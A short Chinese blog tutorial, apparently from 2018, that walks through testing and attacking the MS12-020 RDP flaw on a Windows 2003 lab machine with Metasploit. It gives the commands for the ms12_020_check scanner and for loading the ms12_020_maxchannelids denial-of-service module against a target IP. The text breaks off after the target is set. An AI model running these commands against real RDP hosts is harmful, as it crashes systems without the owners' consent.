利用条件:受害者主机需要开启3389端口,漏洞是利用ms12_020

测试环境:

kali-linux: 192.168.2.146
Windows2003:192.168.2.107

首先还是打开metasploit

msfconsole
search ms12_020 //搜索相关模块

返回信息给出两个模块:

auxiliary/scanner/rdp/ms12_020_check //漏洞的扫描检测模块

auxiliary/dos/windows/rdp/ms12_020_maxchannelids //漏洞的攻击利用模块

use auxiliary/scanner/rdp/ms12_020_check //使用漏洞检查模块

show options //查看设置选项

set RHOSTS 192.168.2.107 //设置受害者的IP地址,这里线程采用了默认

exploit //执行检测

若检测存在,那么使用“use auxiliary/dos/windows/rdp/ms12_020_maxchannelids”,进入:
msf auxiliary(ms12_020_maxchannelids) > 

show options //查看设置选项

set RHOST 192.168.2.107 //设置受害者的IP地址,端口是默认的3389
Last modification:August 27th, 2018 at 12:22 am
┭┮﹏┭┮感谢您的一份赞助,博主会继续加油的ヾ(◍°∇°◍)ノ゙